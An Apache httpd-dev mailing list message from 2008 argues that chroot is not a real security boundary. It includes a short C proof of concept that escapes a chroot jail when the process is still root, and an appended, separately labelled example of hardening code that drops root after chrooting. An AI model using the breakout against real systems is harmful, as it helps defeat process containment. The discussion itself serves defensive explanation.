httpd-dev mailing list archives

From Plüm, Rüdiger, VF-Group <ruediger.pl...@vodafone.com>
Subject RE: High security
Date Thu, 24 Jan 2008 12:50:54 GMT

> -----Original Message-----
> From: Colm MacCarthaigh [mailto:colm@allcosts.net] 
> Sent: Thursday, 24 January 2008 13:16
> To: dev@httpd.apache.org
> Subject: Re: High security
> 
> On Thu, Jan 24, 2008 at 01:10:23PM +0100, Nick Gearls wrote:
> > You specify one directive, and the only thing you have to put in the
> > jail is your htdocs and logs directories; all other files (conf,
> > modules, httpd, libraries, etc.) are outside of the jail. This is really
> > top security - it's almost impossible to find something to hack.
> 
> Well don't kid yourself, it makes privilege escalation by certain routes
> much harder, but it's not even close to almost impossible. There are
> many forms of IPC available between the children and the root-level
> Apache process anyway, and if you manage to exploit that it's game over
> anyway (including breaking out of the jail). 

Yep. chroot was never designed to be a security feature. It can make
things more difficult to leave a jailed area.

See also http://kerneltrap.org/Linux/Abusing_chroot

or have a look at

#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>

int main(int argc, char *argv[])
{
    FILE *file;

    /* Enter the jail; the process is still root afterwards. */
    if (chroot("/tmp/zw/blah1") != 0 || chdir("/") != 0)
        return 1;
    file = fopen("blah1", "w");
    if (file == NULL)
        return 1;
    fprintf(file, "Hello\n");
    fclose(file);
    /* Still root, so chroot() is still permitted inside the jail. */
    mkdir("foo", 0755);
    chroot("foo");
    chdir("..");
    chdir("blah2");
    /* This file ends up in /tmp/zw/blah2, outside the original jail. */
    file = fopen("blah2", "w");
    if (file == NULL)
        return 1;
    fprintf(file, "Hello\n");
    fclose(file);
    return 0;
}

which allows you to escape the chroot of /tmp/zw/blah1 if
you are still root at the point of time mkdir is executed
and write a file to /tmp/zw/blah2

Regards

Rüdiger
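The mitigation this message points at, as an added example that is not part of the thread or of httpd: chroot() and then give up root in the same step, so that the mkdir/chroot/chdir("..") sequence above is refused with EPERM. The jail path and uid/gid 65534 are assumptions for the demo.

```c
#define _GNU_SOURCE
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Return codes of enter_jail(). */
enum { JAIL_OK = 0, JAIL_EINVAL, JAIL_ECHROOT, JAIL_ECHDIR, JAIL_EDROP, JAIL_ESTILLROOT };
/* 1 when real, effective and saved uid/gid are all non-zero: the process
 * can no longer regain root, so it can no longer call chroot() or mkdir
 * its way out as in the snippet above. */
int privileges_irrevocably_dropped(void)
{
    uid_t ru, eu, su;
    gid_t rg, eg, sg;
    if (getresuid(&ru, &eu, &su) != 0 || getresgid(&rg, &eg, &sg) != 0)
        return 0;
    return ru && eu && su && rg && eg && sg;
}

/* Confine the process to `jail` and give up root in the same step. The
 * order matters: chroot() and chdir("/") while still root, then drop the
 * supplementary groups, gid and uid (real, effective AND saved). */
int enter_jail(const char *jail, uid_t uid, gid_t gid)
{
    if (uid == 0 || gid == 0)
        return JAIL_EINVAL;      /* a jail that keeps root is no jail */
    if (chroot(jail) != 0)
        return JAIL_ECHROOT;     /* ENOENT, or EPERM when not root */
    if (chdir("/") != 0)
        return JAIL_ECHDIR;      /* cwd must be inside the new root */
    if (setgroups(0, NULL) != 0 || setresgid(gid, gid, gid) != 0 ||
        setresuid(uid, uid, uid) != 0)
        return JAIL_EDROP;
    if (!privileges_irrevocably_dropped() || setuid(0) == 0)
        return JAIL_ESTILLROOT;  /* regaining root must fail now */
    return JAIL_OK;
}

int main(int argc, char *argv[])
{
    /* Jail path and uid/gid 65534 (nobody) are assumptions for the demo. */
    int rc = enter_jail(argc > 1 ? argv[1] : "/var/empty", 65534, 65534);
    if (rc != JAIL_OK) {
        fprintf(stderr, "enter_jail failed with code %d\n", rc);
        return 1;
    }
    puts(chroot(".") == 0 ? "chroot still allowed: BAD" : "chroot refused: jailed and unprivileged");
    return 0;
}
```

Run it as root with an existing empty directory as the argument; the final line should report that chroot() is refused.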
